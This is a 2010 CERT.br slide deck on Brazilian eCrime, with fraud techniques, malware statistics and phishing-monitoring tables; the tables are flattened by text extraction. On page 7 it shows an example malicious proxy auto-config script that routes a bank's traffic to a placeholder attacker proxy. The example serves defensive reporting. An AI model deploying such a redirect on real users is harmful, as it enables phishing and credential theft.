The Global eCrime Outlook
CERT.br National Report
Cristine Hoepers
[email protected]
CERT.br – Computer Emergency Response Team Brazil
NIC.br – Network Information Center Brazil
CGI.br – Brazilian Internet Steering Committee
APWG CeCOS IV, São Paulo, Brazil – May 11–13, 2010 – p. 1/12
About CERT.br
Created in 1997 as the national focal point to handle computer
security incident reports and activities related to networks
connected to the Internet in Brazil.
http://www.cert.br/mission.html
APWG CeCOS IV, São Paulo, Brazil – May 11–13, 2010 – p. 2/12
Our Parent Organization: CGI.br
Among the diverse responsibilities of The Brazilian
Internet Steering Committee – CGI.br, the main
attributions are:
• to propose policies and procedures related to the regulation of
the Internet activities
• to recommend standards for technical and operational
procedures
• to establish strategic directives related to the use and
development of Internet in Brazil
• to promote studies and technical standards for the network
and services’ security in the country
• to coordinate the allocation of Internet addresses (IPs) and the
registration of domain names using <.br>
• to collect, organize and disseminate information on Internet
services, including indicators and statistics
APWG CeCOS IV, São Paulo, Brazil – May 11–13, 2010 – p. 3/12
CGI.br/NIC.br Structure
01- Ministry of Science and Technology
02- Ministry of Communications
03- Presidential Cabinet
04- Ministry of Defense
05- Ministry of Development, Industry and Foreign Trade
06- Ministry of Planning, Budget and Management
07- National Telecommunications Agency
08- National Council of Scientific and Technological Development
09- National Forum of Estate Science and Technology Secretaries
10- Internet Expert
APWG CeCOS IV, São Paulo, Brazil – May 11–13, 2010 – p. 4/12
11- Internet Service Providers
12- Telecom Infrastructure Providers
13- Hardware and Software Industries
14- General Business Sector Users
15- Non-governamental Entity
16- Non-governamental Entity
17- Non-governamental Entity
18- Non-governamental Entity
19- Academia
20- Academia
21- Academia
Agenda
Fraud Techniques in Use
Malware Statistics
Phishing Monitoring
References
APWG CeCOS IV, São Paulo, Brazil – May 11–13, 2010 – p. 5/12
Fraud Techniques in Use (1/2)
• old tricks still prevalent
• malware modifying client’s hosts file
– really old, but still very effective
• widespread use of drive-by downloads
– several cases published by the media involving main
webpages of telecom and other big companies
• malware registering itself as BHO (Browser Helper
Object)
APWG CeCOS IV, São Paulo, Brazil – May 11–13, 2010 – p. 6/12
Fraud Techniques in Use (2/2)
• malware interacting with the real site in order to validate
user information (account data, password, etc)
– making sandbox analysis harder
• malware modifying browser proxy auto configuration
settings to redirect users to phony pages
example: http://evil.domain.example/network.pac
function FindProxyForURL(url, host) {
var a = "PROXY evil.domain.example:80";
if (shExpMatch(host, "www.my-bank.example")) {
return a;
}
return "DIRECT";
}
APWG CeCOS IV, São Paulo, Brazil – May 11–13, 2010 – p. 7/12
Malware Statistics
Malware* statistics: from 2006 to March 2010:
Category
unique URLs
unique malware samples (unique hashes)
AV signatures (unique)
AV signatures (grouped by “family”)
File extensions
Domains
IP Addresses
Country Codes
Email notifications sent by CERT.br
2006
2007
2008
2009
2010(1Q)
25,087
19,148
1,988
140
73
5,587
3,859
75
18,839
19,981
16,946
3,032
109
112
7,795
4,415
83
17,483
17,376
14,256
6,085
63
112
5,916
3,921
78
15,499
10864
8151
4101
93
100
4447
3233
76
9935
2798
1870
1387
51
46
1311
996
53
2236
(*) Include {key,screen}loggers, trojan downloaders – do not include bots/botnets and worms
APWG CeCOS IV, São Paulo, Brazil – May 11–13, 2010 – p. 8/12
AV Vendors Efficiency
APWG CeCOS IV, São Paulo, Brazil – May 11–13, 2010 – p. 9/12
Phishing Monitoring (1/2)
2009-03-23 – 2009-12-31
Number of cases
BR bank targets
Other targets
Unique URLs
Unique hashes
Domains
IPs Addresses
Uptime
≤ 15 min
≤ 1 hour
≤ 6 hour
≤ 12 hour
≤ 1 day
≤ 1 week
> 1 week
3332
1916
1416
3215
1672
1619
1344
cases
24
324
765
259
361
1100
499
Uptime (max) 218d 05h 26m
Uptime (avg)
4d 07h 12m
APWG CeCOS IV, São Paulo, Brazil – May 11–13, 2010 – p. 10/12
2010-01-01 – 2010-04-30
Number of cases
BR bank targets
Other targets
Unique URLs
Unique hashes
Domains
IPs Addresses
Uptime
≤ 15 min
≤ 1 hour
≤ 6 hour
≤ 12 hour
≤ 1 day
≤ 1 week
> 1 week
1968
1412
556
1933
979
1343
1182
cases
12
237
442
129
215
594
339
Uptime (max) 119d 23h 59m
Uptime (avg)
4d 15h 06m
Phishing Monitoring (2/2)
2010-01-01 – 2010-04-30
2009-03-23 – 2009-12-31
# Country Code cases
1
2
3
4
5
6
7
8
9
10
#
ASN
1
2
3
4
5
6
7
8
9
10
15201
27715
8167
7738
21844
2914
7132
16397
4230
27990
BR
US
DE
PA
CA
FR
GB
CN
KR
AU
%
# Country Code cases
1853 55.61
897 26.92
81 2.43
69 2.07
43 1.29
40 1.20
39 1.17
38 1.14
35 1.05
26 0.78
(Universo Online)
(LocaWeb)
(Oi)
(Oi)
(ThePlanet)
(NTT America)
(AT&T)
(Comdominio)
(Embratel)
(Hosting Panama)
1
2
3
4
5
6
7
8
9
10
cases
%
#
ASN
575
405
121
111
98
91
84
79
72
68
17.20
12.11
3.62
3.32
2.93
2.72
2.51
2.36
2.15
2.03
1
2
3
4
5
6
7
8
9
10
15201
27715
21844
28299
8167
11798
2914
7738
46475
16276
APWG CeCOS IV, São Paulo, Brazil – May 11–13, 2010 – p. 11/12
BR
US
DE
GB
IT
FR
CN
NL
CA
AU
%
714 36.28
618 31.40
97 4.93
56 2.85
55 2.79
54 2.74
35 1.78
32 1.63
28 1.42
26 1.32
(Universo Online)
(LocaWeb)
(ThePlanet)
(CYBERWEB)
(Oi)
(Bluehost Inc.)
(NTT America)
(Oi)
(Limestone)
(OVH)
cases
%
119
114
86
80
67
49
48
45
42
40
6.01
5.76
4.35
4.04
3.39
2.48
2.43
2.27
2.12
2.02
References
• Brazilian Internet Steering Comittee – CGI.br
http://www.cgi.br/
• Network Information Center Brazil – NIC.br
http://www.nic.br/
• Computer Emergency Response Team Brazil – CERT.br
http://www.cert.br/
APWG CeCOS IV, São Paulo, Brazil – May 11–13, 2010 – p. 12/12